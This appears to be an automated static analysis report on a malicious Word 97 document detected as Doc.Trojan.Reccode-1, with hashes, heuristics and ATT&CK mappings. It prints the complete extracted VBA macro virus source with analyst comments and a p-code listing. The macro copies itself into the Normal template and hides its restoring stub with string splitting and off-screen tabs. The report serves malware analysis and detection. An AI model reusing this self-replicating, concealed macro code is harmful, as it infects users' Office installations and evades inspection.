Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 92d744151b322c53…

MALICIOUS

Office (OLE)

35.0 KB Created: 1999-04-05 10:02:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 97eb3d0b894e81de54b71e396812ff17 SHA-1: 047db5b3219058d9bc610d56dc7e32123bca2d7f SHA-256: 92d744151b322c53e90d9834240ae583d5a251f21817aab15c49ca305ac3252a
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, a common technique for executing malicious code as soon as a document is opened. The macro attempts to deobfuscate and execute code, likely to download and run a secondary payload, although no network or download call is visible in the extracted macro source below. What the extracted source does show is self-replication: the macro copies its own module text into a document variable named RecCode in both the current project and the Normal template, then overwrites the first code module of each with a Document_Close stub that restores that code — persistence through the Normal template (MITRE ATT&CK T1137.001, Office Template Macros). The ClamAV detection of 'Doc.Trojan.Reccode-1' further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Reccode-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Reccode-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4660 bytes
SHA-256: 9fba49eff5978058ae28a2024e0673f7e76afaf3e062962bb0fd4c7a6d9b44c3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst annotation of the extracted sample (not a reference implementation).
' Document_Open is an auto-executing event handler: it runs when the document
' is opened. The body copies this module's own source into a document
' variable and then rewrites the first code module of the Normal template and
' of this project, so the code survives beyond this one document. Every step
' goes through the VBProject object model; on current Office builds that model
' is typically reachable only when "Trust access to the VBA project object
' model" is enabled, which makes that setting both a hardening control and a
' detection point for defenders.
Private Sub Document_Open()
' Handles to three VBA projects: the Normal template, the `Project` object's
' ThisDocument (its exact binding is not shown in this listing), and this
' document itself.
Dim NTmp As Object
Set NTmp = Normal.ThisDocument
Dim Adc As Object
Set Adc = Project.ThisDocument
Dim TDc As Object
Set TDc = ThisDocument
' First code module of each project: AC = Project, NC = Normal, TD = this document.
Set AC = Adc.VBProject.VBComponents(1).CodeModule
Set NC = NTmp.VBProject.VBComponents(1).CodeModule
Set TD = TDc.VBProject.VBComponents(1).CodeModule
' Stash the complete text of this module in a document variable named
' "RecCode" on both the Normal template and the project; the stub written
' below reads it back from Variables(1).
NTmp.Variables("RecCode").Value = TD.Lines(1, TD.CountOfLines)
Adc.Variables("RecCode").Value = TD.Lines(1, TD.CountOfLines)
' The next four assignments assemble one VBA statement from string fragments,
' so the full statement never appears contiguously in the module. Concatenated:
' "With ThisDocument.VBProject.VBComponents(1).CodeModule: .DeleteLines 1,
'  .CountOfLines: .InsertLines 1, ThisDocument.Variables(1).Value: End With"
UnstealthA = "With ThisDo" & "cument.VBPr" & "oject." & "VBCompo" & "nents(1" & ").CodeModule: "
UnstealthB = ".DeleteL" & "ines 1" & ", .CountO" & "fLines: "
UnStealthC = ".InsertLin" & "es 1, T" & "hisDo" & "cument.Variab" & "les(1)" & ".Value: "
UnStealthD = "End With"
' 175 leading tab characters push the statement far to the right, off-screen
' in the VBA editor; the ShowVisualBasicEditor check exits early when the
' editor is open, i.e. while someone is looking at the code.
UnStealth = String(175, Chr(9)) & "If ShowVisualBasicEditor = True Then Exit Sub: " & UnstealthA & UnstealthB & UnStealthC & UnStealthD
' Replace the Normal template's and the project's first module with a
' Document_Close stub whose only body is the hidden statement. On close that
' stub restores the stashed source from Variables(1) — presumably RecCode,
' which assumes it is the first document variable; not verified here.
NC.DeleteLines 1, NC.CountOfLines: NC.InsertLines 1, "Private Sub Document_Close" & Chr(13) & UnStealth & Chr(13) & "End Sub"
AC.DeleteLines 1, AC.CountOfLines: AC.InsertLines 1, "Private Sub Document_Close" & Chr(13) & UnStealth & Chr(13) & "End Sub"
End Sub

' Processing file: /opt/analyzer/scan_staging/b2095bf0965b4098a9de21d300997fea.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5879 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	Dim 
' 	VarDefn NTmp (As Object)
' Line #2:
' 	SetStmt 
' 	Ld Normal 
' 	MemLd ThisDocument 
' 	Set NTmp 
' Line #3:
' 	Dim 
' 	VarDefn Adc (As Object)
' Line #4:
' 	SetStmt 
' 	Ld Project 
' 	MemLd ThisDocument 
' 	Set Adc 
' Line #5:
' 	Dim 
' 	VarDefn TDc (As Object)
' Line #6:
' 	SetStmt 
' 	Ld ThisDocument 
' 	Set TDc 
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld Adc 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set AC 
' Line #8:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NTmp 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NC 
' Line #9:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld TDc 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set TD 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld TD 
' 	MemLd CountOfLines 
' 	Ld TD 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0007 "RecCode"
' 	Ld NTmp 
' 	ArgsMemLd Variables 0x0001 
' 	MemSt Value 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld TD 
' 	MemLd CountOfLines 
' 	Ld TD 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0007 "RecCode"
' 	Ld Adc 
' 	ArgsMemLd Variables 0x0001 
' 	MemSt Value 
' Line #12:
' 	LitStr 0x000B "With ThisDo"
' 	LitStr 0x000B "cument.VBPr"
' 	Concat 
' 	LitStr 0x0006 "oject."
' 	Concat 
' 	LitStr 0x0007 "VBCompo"
' 	Concat 
' 	LitStr 0x0007 "nents(1"
' 	Concat 
' 	LitStr 0x000E ").CodeModule: "
' 	Concat 
' 	St UnstealthA 
' Line #13:
' 	LitStr 0x0008 ".DeleteL"
' 	LitStr 0x0006 "ines 1"
' 	Concat 
' 	LitStr 0x0009 ", .CountO"
' 	Concat 
' 	LitStr 0x0008 "fLines: "
' 	Concat 
' 	St UnstealthB 
' Line #14:
' 	LitStr 0x000A ".InsertLin"
' 	LitStr 0x0007 "es 1, T"
' 	Concat 
' 	LitStr 0x0005 "hisDo"
' 	Concat 
' 	LitStr 0x000D "cument.Variab"
' 	Concat 
' 	LitStr 0x0006 "les(1)"
' 	Concat 
' 	LitStr 0x0008 ".Value: "
' 	Concat 
' 	St UnStealthC 
' Line #15:
' 	LitStr 0x0008 "End With"
' 	St UnStealthD 
' Line #16:
' 	LitDI2 0x00AF 
' 	LitDI2 0x0009 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd String$ 0x0002 
' 	LitStr 0x002F "If ShowVisualBasicEditor = True Then Exit Sub: "
' 	Concat 
' 	Ld UnstealthA 
' 	Concat 
' 	Ld UnstealthB 
' 	Concat 
' 	Ld UnStealthC 
' 	Concat 
' 	Ld UnStealthD 
' 	Concat 
' 	St UnStealth 
' Line #17:
' 	LitDI2 0x0001 
' 	Ld NC 
' 	MemLd CountOfLines 
' 	Ld NC 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitStr 0x001A "Private Sub Document_Close"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld UnStealth 
' 	Co
... (truncated)